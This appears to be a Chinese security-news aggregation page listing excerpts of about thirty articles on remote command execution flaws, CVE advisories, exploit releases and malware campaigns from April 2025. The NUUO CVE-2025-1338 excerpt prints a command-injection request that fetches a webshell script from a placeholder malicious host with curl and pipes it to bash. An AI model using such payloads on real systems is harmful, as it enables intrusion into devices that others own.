工具篇 | 超绝!漏洞盒子一键自动提交脚本,效率飞升秘籍
工具篇 | 超绝!漏洞盒子一键自动提交脚本,效率飞升秘籍 原创 零日安全实验室 零日安全实验室 2025-04-29 01:08 免责声明! 本 公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。 大 纲 前言 怎么使用? 使用效果 1 前言 在我们挖掘漏洞的时候如果手上有几百个几十个相同类型的漏洞,假设现在有50个未授
继续阅读标签: 命令执行
【漏洞复现】Erlang/OTP SSH远程代码执行漏洞(CVE-2025-32433)环境搭建与POC使用指南
【漏洞复现】Erlang/OTP SSH远程代码执行漏洞(CVE-2025-32433)环境搭建与POC使用指南 云梦DC 云梦安全 2025-04-29 01:03 漏洞简介 CVE-2025-32433 是近日披露的一个高危漏洞,影响到了 Erlang/OTP 的 SSH 服务器组件。 攻击者可以通过特制的 SSH 消息,在无需认证 的情况下直接触发远程代码执行(RCE)! 受影响版本: O
继续阅读【吾好梦中测站】一次资金盘渗透的源码爬取与0day挖掘实录
【吾好梦中测站】一次资金盘渗透的源码爬取与0day挖掘实录 原创 菜狗安全 菜狗安全 2025-04-29 00:00 点击上方蓝字·关注我们 免责声明 由于传播、利用本公众号 菜狗安全 所提供的信息而造成的任何直接或者间接的后果及损失,均由 使用者本人负责,公众号 菜狗安全 及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,会立即删除并致歉。 文章目录 前言:一场离奇的梦中渗透
继续阅读XWiki SolrSearch接口存在远程命令执行漏洞CVE-2025-24893 附POC
XWiki SolrSearch接口存在远程命令执行漏洞CVE-2025-24893 附POC 2025-4-28更新 南风漏洞复现文库 2025-04-28 15:28 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 1. XWiki简介
继续阅读福建科立讯指挥调度管理平台send_fax远程命令执行漏洞
福建科立讯指挥调度管理平台send_fax远程命令执行漏洞 原创 SXdysq 南街老友 2025-04-28 12:14 字数 319,阅读大约需 2 分钟 产品介绍 福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护
继续阅读虚假安全补丁攻击WooCommerce管理员以劫持网站
虚假安全补丁攻击WooCommerce管理员以劫持网站 FreeBuf 2025-04-28 10:32 一场大规模钓鱼攻击正针对WooCommerce用户,通过伪造安全警报诱使他们下载所谓的”关键补丁”,实则为植入WordPress后门的恶意程序。 01 恶意插件植入 根据Patchstack研究人员发现,上当受骗的用户在下载更新时,实际上安装的是恶意插件。该插件会: &
继续阅读安全热点周报:黑客精心设计 Craft CMS 漏洞链,用于零日攻击窃取数据
安全热点周报:黑客精心设计 Craft CMS 漏洞链,用于零日攻击窃取数据 奇安信 CERT 2025-04-28 10:01 安全资讯导视 • 金融监管总局拟制定《银行业保险业网络安全管理办法》 • 远程控制、窃密、挖矿!我国境内捕获“银狐”木马病毒变种 • 马来西亚多家券商系统遭境外攻击,大量交易账户被操纵买卖股票 PART01 新增在野利用 1.Craft CMS 远程代码执行漏洞(CV
继续阅读CNVD漏洞周报2025年第16期
CNVD漏洞周报2025年第16期 原创 CNVD CNVD漏洞平台 2025-04-28 08:43 2 0 2 5 年 0 4 月 21 日 – 2 0 2 5 年 0 4月27日 本周漏洞态势研判情况 本 周 信 息 安 全 漏 洞 威 胁 整 体 评 价 级 别 为中 。 国家信息安全漏洞共享平台(以下简称CNVD)本周共收集、整理信息安全漏洞484个,其中高危漏洞250个、中
继续阅读雷神众测漏洞周报2025.4.21-2025.4.27
雷神众测漏洞周报2025.4.21-2025.4.27 雷神众测 雷神众测 2025-04-28 07:00 摘要 以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。 雷神众测拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明雷神众测允许,不得任意修改或
继续阅读Craft CMS CVE-2025-32432 exp发布
Craft CMS CVE-2025-32432 exp发布 独眼情报 2025-04-28 06:32 Craft CMS 0day, CVE-2025-32432 安全研究员 Chocapikk 发布了一个 Metasploit 模块,用于影响 Craft CMS 的关键零日漏洞,该漏洞被追踪为 CVE-2025-32432 (CVSS 10)。 这种远程代码执行 (RCE) 漏洞,当与 Yi
继续阅读立即保护好Clash Verge rev! 远程命令执行漏洞公开!
立即保护好Clash Verge rev! 远程命令执行漏洞公开! 原创 一个不正经的黑客 一个不正经的黑客 2025-04-28 06:19 立即保护好Clash Verge rev! 远程命令执行漏洞公开! 免责声明: 本文仅限学习、研究使用!其他用途责任自负 背景信息 2天之前clash Verge rev 被爆出存在本地提权漏洞,群友们传的沸沸扬扬说这个漏洞本质是命令执行漏洞。 因为自己也
继续阅读安全动态回顾|“银狐”木马病毒再度来袭 关键Commvault RCE漏洞允许远程攻击者执行任意代码
安全动态回顾|“银狐”木马病毒再度来袭 关键Commvault RCE漏洞允许远程攻击者执行任意代码 胡金鱼 嘶吼专业版 2025-04-28 06:00 2025.4.14—4.20安全动态周回顾 2025.4.7—4.13安全动态周回顾 2025.3.31—4.6安全动态周回顾 2025.3.24—3.30安全动态周回顾 2025.3.17—3.23安全动态周回顾 2025.3.10—3.16
继续阅读漏洞预警 西部数据 NAS remoteBackups.php 命令执行漏洞
漏洞预警 西部数据 NAS remoteBackups.php 命令执行漏洞 by 融云安全-cas 融云攻防实验室 2025-04-28 02:30 0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果
继续阅读浅谈常见edu漏洞,逻辑漏洞、越权、接管、小白如何快速找准漏洞
浅谈常见edu漏洞,逻辑漏洞、越权、接管、小白如何快速找准漏洞 薛定谔不喜欢猫 富贵安全 2025-04-28 01:15 今年对某高校进行了渗透测试,发现了一些比较经典的漏洞,写一下和师傅们一起分享。 1.教务系统登录处短信轰炸 学校的教务系统登录处,发现有一个手机验证码认证 这里会发送一个验证码 正常来说,每发送一次短信验证码,这个校验码就会自动更新一次,然后会报错:“验证码错误”。 但是这里
继续阅读DslogdRAT 恶意软件利用 Ivanti ICS 0day漏洞(CVE-2025-0282)攻击日本
DslogdRAT 恶意软件利用 Ivanti ICS 0day漏洞(CVE-2025-0282)攻击日本 会杀毒的单反狗 军哥网络安全读报 2025-04-28 01:03 导读 网络安全研究人员警告称,一种名为 DslogdRAT 的新恶意软件在利用 Ivanti Connect Secure (ICS) 中现已修补的安全漏洞部署。 JPCERT/CC 研究员 Yuma Masubuchi在周
继续阅读浅谈常见edu漏洞,逻辑漏洞、越权、接管、getshell,小白如何快速找准漏洞
浅谈常见edu漏洞,逻辑漏洞、越权、接管、getshell,小白如何快速找准漏洞 薛定谔不喜欢猫 神农Sec 2025-04-28 01:02 扫码加圈子 获内部资料 网络安全领域各种资源,EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章,以及工具分享、前沿信息分享、POC、EXP分享。 不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。 原文链接: h
继续阅读核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338)
核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338) 云梦DC 云梦安全 2025-04-28 01:01 0x01 漏洞杀伤链 攻击向量: GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1 Host: target-ip 实现效果: ✅ 任意命令执行(代码注入) ✅ /e
继续阅读Wazuh监视恶意命令执行
Wazuh监视恶意命令执行 原创 网络安全菜鸟 安全孺子牛 2025-04-28 00:33 点击蓝字,关注我 1.简介 1.1 功能简介 Auditd 是 Linux 系统原生的审计实用程序。它用于 Linux 终结点中的记账操作和更改。 在 Ubuntu 端点上配置 Auditd,以考虑给定用户执行的所有命令。这包括用户在模式下或更改为 root 用户后运行的命令。您可以配置自定义 Wazuh
继续阅读漏洞预警 | PyTorch远程命令执行漏洞
漏洞预警 | PyTorch远程命令执行漏洞 浅安 浅安安全 2025-04-28 00:01 0x00 漏洞编号 – # CVE-2025-32434 0x01 危险等级 – 高危 0x02 漏洞概述 PyTorch是一个开源的深度学习框架,广泛用于机器学习和人工智能领域。 0x03 漏洞详情 CVE-2025-32434 漏洞类型: 命令执行 影响: 执行任意代码 简述
继续阅读漏洞预警 | 金蝶云星空反序列化漏洞
漏洞预警 | 金蝶云星空反序列化漏洞 浅安 浅安安全 2025-04-28 00:01 0x00 漏洞编号 – # 暂无 0x01 危险等级 – 高危 0x02 漏洞概述 金蝶云星空是一款基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。 0x03 漏洞详情 漏洞类型: 反序列化 影响: 远程命 令执行 简述: 金蝶云星空 的Busines
继续阅读【安全圈】CVE-2025-3248:Langflow 开源平台严重远程代码执行漏洞威胁 AI 工作流安全
【安全圈】CVE-2025-3248:Langflow 开源平台严重远程代码执行漏洞威胁 AI 工作流安全 安全圈 2025-04-27 11:01 关键词 安全漏洞 网络安全研究人员在 Langflow 中发现了一个严重的远程代码执行(RCE)漏洞。Langflow 是一个被广泛用于以可视化方式构建由人工智能驱动的智能体和工作流程的开源平台。 这个高严重性漏洞被编号为 CVE-2025-3248
继续阅读每周网安资讯 (4.22-4.27)|Johnson Controls ICU漏洞预警
每周网安资讯 (4.22-4.27)|Johnson Controls ICU漏洞预警 交大捷普 2025-04-27 10:15 2025[ 每周网安资讯 ]4.22-4.27 网安资讯 1、全国数标委公开征求《可信数据空间 技术架构(征求意见稿)》技术文件意见 为贯彻落实《国家数据基础设施建设指引》《可信数据空间发展行动计划(2024—2028年)》等政策文件要求,充分考虑可信数据空间作为数据
继续阅读SAP修复已遭利用的0day漏洞
SAP修复已遭利用的0day漏洞 Bill Toulas 代码卫士 2025-04-27 10:12 聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 SAP 公司紧急修复位于 NetWeaver 中的一个远程代码执行 (RCE) 0day 漏洞,它可用于劫持服务器。 该漏洞的编号是CVE-2025-31324,CVSS评分10分,是一个位于SAP NetWeaver Visual Compo
继续阅读Craft CMS RCE利用链用于窃取数据
Craft CMS RCE利用链用于窃取数据 Lawrence Abrams 代码卫士 2025-04-27 10:12 聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Orange Cyberdefense 公司提到,Craft CMS 中存在两个漏洞,可用于攻陷服务器和窃取数据。 这两个漏洞是由 Orange Cyberdefense 公司的部门CSIRT在调查一台受陷服务器时发现的。这
继续阅读CVSS10分!Erlang/OTP SSH远程代码执行漏洞安全风险通告
CVSS10分!Erlang/OTP SSH远程代码执行漏洞安全风险通告 应急响应中心 亚信安全 2025-04-27 10:07 今日,亚信安全CERT监控到安全社区研究人员发布安全通告,Erlang/OTP存在一个远程代码执行漏洞,编号为 CVE-2025-32433。攻击者可以通过构造特定 SSH 协议消息,在未进行身份验证的情况下在受影响的系统上执行任意代码。这一漏洞使得攻击者能够获取系统
继续阅读【已复现】Craft CMS generate-transform 反序列化代码执行漏洞(CVE-2025-32432)
【已复现】Craft CMS generate-transform 反序列化代码执行漏洞(CVE-2025-32432) 原创 安全探索者 安全探索者 2025-04-27 10:07 ↑点击关注,获取更多漏洞预警,技术分享 0x01 组件介绍 Craft CMS 是一个灵活、用户友好的内容管理系统,用于创建自定义的数字网络体验和其他体验。 搜索语法: app=”craft-cms&#
继续阅读同步漏洞行动:朝鲜Lazarus APT组织针对韩国供应链发起攻击
同步漏洞行动:朝鲜Lazarus APT组织针对韩国供应链发起攻击 FreeBuf 2025-04-27 10:06 与朝鲜有关的Lazarus组织在一项名为”同步漏洞行动”(Operation SyncHole)的网络间谍活动中,针对至少六家韩国企业发起攻击。 卡巴斯基研究人员报告称,这个朝鲜背景的APT(高级持续性威胁)组织自2024年11月以来持续活跃,采用水坑攻击手
继续阅读SAP NetWeaver中存在严重漏洞,面临主动利用威胁
SAP NetWeaver中存在严重漏洞,面临主动利用威胁 原创 David Jones 信息安全D1net 2025-04-27 09:44 点击上方“蓝色字体 ”,选择 “设为星标 ” 关键讯息,D1时间送达! 已观察到攻击者正在投放webshell后门程序,研究人员警告称,该应用程序在政府机构中颇受欢迎。 安全研究人员警告称,黑客正在积极利用SAP NetWeaver Visual Comp
继续阅读【文章转载】DragonForce与Anubis再掀风暴:勒索软件“加盟制”全面升级,你的数据还安全吗?
【文章转载】DragonForce与Anubis再掀风暴:勒索软件“加盟制”全面升级,你的数据还安全吗? solarsec solar应急响应团队 2025-04-27 07:41 点击蓝字 关注我们 尽管国际执法部门成功打击了多个知名勒索软件组织,但网络犯罪分子依然展现出极强的韧性和适应能力。2025年,Secureworks® 威胁对抗中心(Counter Threat Unit™,简称CTU
继续阅读一个漏洞仓库免费送~
一个漏洞仓库免费送~ 菜狗 富贵安全 2025-04-27 06:29 后台回复 POC即可获得地址 – CMS漏洞 74cms v4.2.1 v4.2.129 后台getshell漏洞 74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374 Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342 AspCMS commentList.as
继续阅读